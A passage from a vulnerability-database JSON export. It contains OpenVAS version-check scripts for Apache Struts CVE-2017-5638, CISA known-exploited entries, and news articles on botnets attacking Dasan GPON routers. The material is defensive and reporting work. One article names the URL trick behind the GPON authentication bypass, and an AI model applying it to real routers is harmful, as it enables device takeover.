value:\"Atlassiona Crowd 2.8.3 until 2.9.6, 2.10.1 until 2.10.2 and 2.11.0.\");\n\n script_tag(name:\"solution\", value:\"Update to version 2.9.7, 2.10.3, 2.11.1 or later.\");\n\n script_xref(name:\"URL\", value:\"https://jira.atlassian.com/browse/CWD-4879\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_in_range(version: version, test_version: \"2.8.3\", test_version2: \"2.9.6\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"2.9.7\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_in_range(version: version, test_version: \"2.10.1\", test_version2: \"2.10.2\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"2.10.3\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_is_equal(version: version, test_version: \"2.11.0\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"2.11.1\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-06T16:26:00", "description": "VMware product updates resolve remote code execution vulnerability via Apache Struts 2", "cvss3": {}, "published": "2017-03-16T00:00:00", "type": "openvas", "title": "VMSA-2017-0004: VMware product updates resolve remote code execution vulnerability via Apache Struts 2", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2019-12-05T00:00:00", "id": "OPENVAS:1361412562310140190", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140190", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# VMSA-2017-0004: VMware product updates resolve remote code execution vulnerability via Apache Struts 2\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140190\");\n script_cve_id(\"CVE-2017-5638\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"2019-12-05T15:10:00+0000\");\n script_name(\"VMSA-2017-0004: VMware product updates resolve remote code execution vulnerability via Apache Struts 2\");\n\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2017-0004.html\");\n\n script_tag(name:\"vuldetect\", value:\"Check the build number\");\n\n script_tag(name:\"insight\", value:\"Remote code execution vulnerability via Apache Struts 2\nMultiple VMware products contain a remote code execution vulnerability due to the use of Apache Struts 2. Successful exploitation of this issue may result in the complete compromise of an affected product.\");\n\n script_tag(name:\"solution\", value:\"See vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"VMware product updates resolve remote code execution vulnerability via Apache Struts 2\");\n\n script_tag(name:\"affected\", value:\"vCenter 6.5 and 6.0\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"2019-12-05 15:10:00 +0000 (Thu, 05 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-03-16 09:26:49 +0100 (Thu, 16 Mar 2017)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_vmware_vcenter_detect.nasl\");\n script_mandatory_keys(\"VMware_vCenter/version\", \"VMware_vCenter/build\");\n\n exit(0);\n\n}\ninclude(\"vmware_esx.inc\");\n\nif ( ! vcenter_version = get_kb_item(\"VMware_vCenter/version\") ) exit( 0 );\nif ( ! vcenter_build = get_kb_item(\"VMware_vCenter/build\") ) exit( 0 );\n\nif( vcenter_version == \"6.0.0\" )\n if ( int( vcenter_build ) <= int( 5112506 ) ) fix = 'See advisory.';\n\nif( vcenter_version == \"6.5.0\" )\n if ( int( vcenter_build ) < int( 5178943 ) ) fix = '6.5.0b';\n\nif( fix )\n{\n security_message( port:0, data: esxi_remote_report( ver:vcenter_version, build: vcenter_build, fixed_build:fix, typ:'vCenter' ) );\n exit(0);\n}\n\nexit(99);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:01", "description": "HPE Universal CMDB is prone to a remote code execution vulnerability in\nApache Struts.", "cvss3": {}, "published": "2017-04-10T00:00:00", "type": "openvas", "title": "HPE Universal CMDB Remote Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310106736", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106736", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_hpe_universal_cmdb_struts_vuln.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# HPE Universal CMDB Remote Code Execution Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:hp:universal_cmbd_foundation';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106736\");\n script_version(\"$Revision: 12106 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-04-10 12:58:34 +0200 (Mon, 10 Apr 2017)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2017-5638\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"HPE Universal CMDB Remote Code Execution Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_hpe_universal_cmdb_detect.nasl\");\n script_mandatory_keys(\"HP/UCMDB/Installed\");\n\n script_tag(name:\"summary\", value:\"HPE Universal CMDB is prone to a remote code execution vulnerability in\nApache Struts.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A potential security vulnerability in Jakarta Multipart parser in Apache\nStruts has been addressed in HPE Universal CMDB. This vulnerability could be remotely exploited to allow code\nexecution via mishandled file upload.\");\n\n script_tag(name:\"affected\", value:\"HP Universal CMDB Foundation Software v10.22 CUP5\");\n\n script_tag(name:\"solution\", value:\"HPE has made mitigation information available to resolve the vulnerability\nfor the impacted versions of HPE Universal CMDB.\");\n\n script_xref(name:\"URL\", value:\"https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbgn03733en_us\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_is_equal(version: version, test_version: \"10.22\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"See advisory\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa_kev": [{"lastseen": "2023-07-21T17:22:44", "description": "Dasan GPON Routers contain an authentication bypass vulnerability. When combined with CVE-2018-10562, exploitation can allow an attacker to perform remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T00:00:00", "type": "cisa_kev", "title": "Dasan GPON Routers Authentication Bypass Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10561", "CVE-2018-10562"], "modified": "2022-03-31T00:00:00", "id": "CISA-KEV-CVE-2018-10561", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-07-21T17:22:44", "description": "Dasan GPON Routers contain an authentication bypass vulnerability. When combined with CVE-2018-10561, exploitation can allow an attacker to perform remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T00:00:00", "type": "cisa_kev", "title": "Dasan GPON Routers Command Injection Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10561", "CVE-2018-10562"], "modified": "2022-03-31T00:00:00", "id": "CISA-KEV-CVE-2018-10562", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-19T19:33:09", "description": "Zyxel EMG2926 routers contain a command injection vulnerability located in the diagnostic tools, specifically the nslookup function. A malicious user may exploit numerous vectors to execute malicious commands on the router, such as the ping_ip parameter to the expert/maintenance/diagnostic/nslookup URI.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-09-18T00:00:00", "type": "cisa_kev", "title": "Zyxel EMG2926 Routers Command Injection Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6884"], "modified": "2023-09-18T00:00:00", "id": "CISA-KEV-CVE-2017-6884", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-07-21T17:22:44", "description": "Apache Struts contains a vulnerability which allows for remote code execution under two circumstances. One, where the alwaysSelectFullNamespace option is true and the value isn't set for a result defined in underlying configurations and in same time, its upper package configuration have no or wildcard namespace. Or, using URL tag which doesn\ufffdt have value and action set and in same time, its upper package configuration have no or wildcard namespace.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Apache Struts Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2018-11776", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-07-21T17:22:44", "description": "Apache Struts Jakarta Multipart parser allows for malicious file upload using the Content-Type value, leading to remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Apache Struts Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2017-5638", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-05-09T12:40:31", "description": "[![hacking-gpon-router-exploit](https://thehackernews.com/images/-6LBdTvZc_IU/WwUw6YS50dI/AAAAAAAAwx0/z1pWc8lu8pg7HWP0gzpDML9U6g0ZLy97gCLcBGAs/s728-e100/hacking-gpon-router-exploit.png)](<https://thehackernews.com/images/-6LBdTvZc_IU/WwUw6YS50dI/AAAAAAAAwx0/z1pWc8lu8pg7HWP0gzpDML9U6g0ZLy97gCLcBGAs/s728-e100/hacking-gpon-router-exploit.png>)\n\nEven after being aware of various active cyber attacks against the GPON Wi-Fi routers, if you haven't yet taken them off the Internet, then be careful\u2014because a new botnet has joined the GPON party, which is exploiting an undisclosed zero-day vulnerability in the wild. \n \nSecurity researchers from Qihoo 360 Netlab have [warned](<https://blog.netlab.360.com/gpon-exploit-in-the-wild-iv-themoon-botnet-join-in-with-a-0day/>) of at least one botnet operator exploiting a new zero-day vulnerability in the Gigabit-capable Passive Optical Network (GPON) routers, manufactured by South Korea-based DASAN Zhone Solutions. \n \nThe botnet, dubbed TheMoon, which was first seen in 2014 and has added at least 6 IoT device exploits to its successor versions since 2017, now exploits a newly undisclosed zero-day flaw for Dasan GPON routers. \n \nNetlab researchers successfully tested the new attack payload on two different versions of GPON home router, though they didn't disclose details of the payload or release any further details of the new zero-day vulnerability to prevent more attacks. \n \nTheMoon botnet gained headlines in the year 2015-16 after it was found spreading malware to a large number of ASUS and Linksys router models using remote code execution (RCE) vulnerabilities. \n \n\n\n### Other Botnets Targeting GPON Routers\n\n[![hacking-gpon-router-exploit](https://thehackernews.com/images/-iX9H-7NcQyY/WwUsk-D6ekI/AAAAAAAAwxo/wHpQsoEKUgcyAOvNuJtgyzqbiY-IuqbkwCLcBGAs/s728-e100/hacking-gpon-router-exploit.png)](<https://thehackernews.com/images/-iX9H-7NcQyY/WwUsk-D6ekI/AAAAAAAAwxo/wHpQsoEKUgcyAOvNuJtgyzqbiY-IuqbkwCLcBGAs/s728-e100/hacking-gpon-router-exploit.png>)\n\nEarlier this month, at least five different botnets were found exploiting [two critical vulnerabilities in GPON](<https://thehackernews.com/2018/05/protect-router-hacking.html>) home routers disclosed last month that eventually allow remote attackers to take full control of the device. \n \nAs detailed in our previous post, the [5 botnet families](<https://thehackernews.com/2018/05/botnet-malware-hacking.html>), including Mettle, Muhstik, [Mirai](<https://thehackernews.com/2016/10/mirai-source-code-iot-botnet.html>), [Hajime](<https://thehackernews.com/2017/04/vigilante-hacker-iot-botnet_26.html>), and [Satori](<https://thehackernews.com/2017/12/satori-mirai-iot-botnet.html>), have been found exploiting an authentication bypass (CVE-2018-10561) and a root-RCE (CVE-2018-10562) flaws in GPON routers. \n \nShortly after the details of the vulnerabilities went public, a working proof-of-concept (PoC) exploit for GPON router vulnerabilities made available to the public, making its exploitation easier for even unskilled hackers. \n \nIn separate research, Trend Micro researchers [spotted](<https://blog.trendmicro.com/trendlabs-security-intelligence/gpon-vulnerabilities-exploited-for-mexico-based-mirai-like-scanning-activities/>) Mirai-like scanning activity in Mexico, targeting GPON routers that use default usernames and passwords. \n \n\n\n> \"Unlike the previous activity, the targets for this new scanning procedure are distributed,\" Trend Micro researchers said. \"However, based on the username and password combinations we found in our data, we concluded that the target devices still consist of home routers or IP cameras that use default passwords.\"\n\n \n\n\n### How to Protect Your Wi-Fi Router From Hacking\n\n \nThe previously disclosed two GPON vulnerabilities had already been reported to DASAN, but the company hasn't yet released any fix, leaving millions of their customers open to these botnet operators. \n \nSo, until the router manufacturer releases an official patch, users can protect their devices by disabling remote administration rights and using a firewall to prevent outside access from the public Internet. \n \nMaking these changes to your vulnerable routers would restrict access to the local network only, within the range of your Wi-Fi network, thus effectively reducing the attack surface by eliminating remote attackers. \n \nWe will update this article with new details, as soon as they are available. Stay Tuned!\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-05-23T09:15:00", "type": "thn", "title": "Hackers are exploiting a new zero-day flaw in GPON routers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10561", "CVE-2018-10562"], "modified": "2018-05-23T09:15:00", "id": "THN:66C2DBEE768691DF8BF72CAE39867B68", "href": "https://thehackernews.com/2018/05/hacking-gpon-routers.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:40:33", "description": "[![dasan-gpon-router-hacking](https://thehackernews.com/images/-wHH4uDuQjnA/WvGe1PZ44UI/AAAAAAAAwlk/fjya_3JQRNsoWA9rzmtL6Tm2uQAmC_KOQCLcBGAs/s728-e100/dasan-gpon-router-hacking.png)](<https://thehackernews.com/images/-wHH4uDuQjnA/WvGe1PZ44UI/AAAAAAAAwlk/fjya_3JQRNsoWA9rzmtL6Tm2uQAmC_KOQCLcBGAs/s728-e100/dasan-gpon-router-hacking.png>)\n\nSince hackers have started exploiting two recently disclosed unpatched critical vulnerabilities found in GPON home routers, security researchers have now released an unofficial patch to help millions of affected users left vulnerable by their device manufacturer. \n \nLast week, researchers at vpnMentor [disclosed](<https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/>) details of\u2014an authentication bypass (CVE-2018-10561) and a root-remote code execution vulnerability (CVE-2018-10562)\u2014in many models of Gigabit-capable Passive Optical Network (GPON) routers manufacturer by South Korea-based DASAN Zhone Solutions. \n \nIf exploited, the first vulnerability lets an attacker easily bypass the login authentication page just by appending ?images/ to the URL in the browser's address bar. \n \nHowever, when coupled with the second flaw that allows command injection, unauthenticated attackers can remotely execute malicious commands on the affected device and modified DNS settings, eventually allowing them to take full control of the device remotely. \n \nShortly after the details of the vulnerabilities went public, security researchers at Chinese IT security firm Qihoo 360 Netlab found that threat actors have started exploiting both the flaws to add the vulnerable routers into their botnet malware networks. \n\n\nMoreover, a working [proof-of-concept](<https://github.com/f3d0x0/GPON>) (PoC) exploit, written in python, for GPON router vulnerabilities has already been released on GitHub by an independent security researcher, eventually making exploitation easier for even unskilled hackers. \n \nThe researchers even published a video demonstration showing how the attack works. \n \n\n\n### Here's How to Secure Your GPON Wi-Fi Router\n\n[![dasan-gpon-router-hacking](https://thehackernews.com/images/-r5giIRZvO8s/WvGnLlXcpBI/AAAAAAAAwl0/UymInPbh9IwpTPklKkqr4peB-P6heWTUACLcBGAs/s728-e100/dasan-gpon-router-hacking.png)](<https://thehackernews.com/images/-r5giIRZvO8s/WvGnLlXcpBI/AAAAAAAAwl0/UymInPbh9IwpTPklKkqr4peB-P6heWTUACLcBGAs/s728-e100/dasan-gpon-router-hacking.png>)\n\nResearchers at vpnMentor already reported the issues to Dasan, but the company has not yet released any fix for the issue, and the researchers believe that the patch is not in development either. \n \nWhat's worse? At the time of writing, almost a million vulnerable GPON routers are still exposed on the Internet and can be easily hijacked. \n \nHowever, even if there is no official patch available, users can protect their devices by disabling remote administration and using a firewall to prevent outside access from the public Internet. \n \nMaking these changes to your vulnerable router would restrict access to the local network only, within the range of your Wi-Fi network, effectively reducing the attack surface by eliminating remote attackers. \n \nIf you are unsure about these settings, vpnMentor has done this job for you by providing an online \"user-friendly\" solution that automatically modifies your router settings on your behalf, keeping you away from remote attacks. \n\n\n> \"It was created to help mitigate the vulnerabilities until an official patch is released,\" the researchers said. \"This tool disables the web server in a way that is not easy to reverse, it can be done with another patch script, but if you are not comfortable with the command line we suggest firewalling your device until an official patch is released.\"\n\nTo use this tool, all you need open this [web page](<https://www.vpnmentor.com/tools/gpon-router-antidote-patch/>), and scroll down to the input form asking for the IP address of your exposed GPON router (local LAN address, not WAN), a new password for SSH/Telnet on your router. \n \nIn a separate tab open your router's web interface using https in the URL and then press \"Run Patch\" on the vpnMentor to continue and apply changes. \n \nYou can apply the patch to secure your devices, but it should be noted that it is not an official patch from the manufacturer and we do not encourage users to run any third-party scripts or patches on their devices. \n \nSo, users should either wait for official fixes or apply changes manually, when possible.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-05-08T13:05:00", "type": "thn", "title": "A Simple Tool Released to Protect Dasan GPON Routers from Remote Hacking", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10561", "CVE-2018-10562"], "modified": "2018-05-08T13:34:08", "id": "THN:EE172E24E32A85AABDE52F47866324C6", "href": "https://thehackernews.com/2018/05/protect-router-hacking.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:40:32", "description": "[![botnet-malware-hacking](https://thehackernews.com/images/-_5RVTg7DpBI/WvRYuRt1z9I/AAAAAAAAwog/Xb37_CgsxfclzqtC0bAy9DoA1S6BMAfrgCLcBGAs/s728-e100/botnet-malware-hacking.png)](<https://thehackernews.com/images/-_5RVTg7DpBI/WvRYuRt1z9I/AAAAAAAAwog/Xb37_CgsxfclzqtC0bAy9DoA1S6BMAfrgCLcBGAs/s728-e100/botnet-malware-hacking.png>)\n\nWell, that did not take long. \n \nWithin just 10 days of the disclosure of two critical [vulnerabilities in GPON router](<https://thehackernews.com/2018/05/protect-router-hacking.html>) at least 5 botnet families have been found exploiting the flaws to build an army of million devices. \n \nSecurity researchers from Chinese-based cybersecurity firm Qihoo 360 Netlab have spotted 5 botnet families, including Mettle, Muhstik, Mirai, Hajime, and Satori, making use of the GPON exploit in the wild. \n \nAs detailed in our previous post, Gigabit-capable Passive Optical Network (GPON) routers manufacturer by South Korea-based DASAN Zhone Solutions have been found vulnerable to an authentication bypass ([CVE-2018-10561](<https://thehackernews.com/2018/05/protect-router-hacking.html>)) and a root-RCE ([CVE-2018-10562](<https://thehackernews.com/2018/05/protect-router-hacking.html>)) flaws that eventually allow remote attackers to take full control of the device. \n \nShortly after the details of the vulnerabilities went public, 360 Netlab researchers warned of threat actors exploiting both the flaws to hijack and add the vulnerable routers into their botnet malware networks. \n \nNow, the researchers have published a [new report](<https://blog.netlab.360.com/gpon-exploit-in-the-wild-i-muhstik-botnet-among-others-en/>), detailing 5 below-mentioned botnet families actively exploiting these issues: \n \n\n\n * **Mettle Botnet **\u2014 Command-and-control panel and the scanner of this botnet is hosted on a server residing in Vietnam. Attackers have been utilizing an open-sourced Mettle attack module to implant malware on vulnerable routers.\n * **Muhstik Botnet **\u2014 This botnet was initially [discovered](<https://twitter.com/TheHackersNews/status/987332168841121794>) just last week when it was actively exploiting a [critical Drupal flaw](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>), and now the latest version of Muhstik has been upgraded to exploit GPON vulnerabilities, along with flaws in JBOSS and DD-WRT firmware.\n * **Mirai Botnet (new variants) **\u2014 GPON exploit has also been integrated into a few new variants (operated by different hacking groups) of the infamous [Mirai IoT botnet](<https://thehackernews.com/2016/10/mirai-source-code-iot-botnet.html>), which was first emerged and open-sourced in 2016 after it was used to launch [record-breaking DDoS attacks](<https://thehackernews.com/2016/10/iot-dyn-ddos-attack.html>).\n * **Hajime Botnet** \u2014 Another infamous IoT botnet, 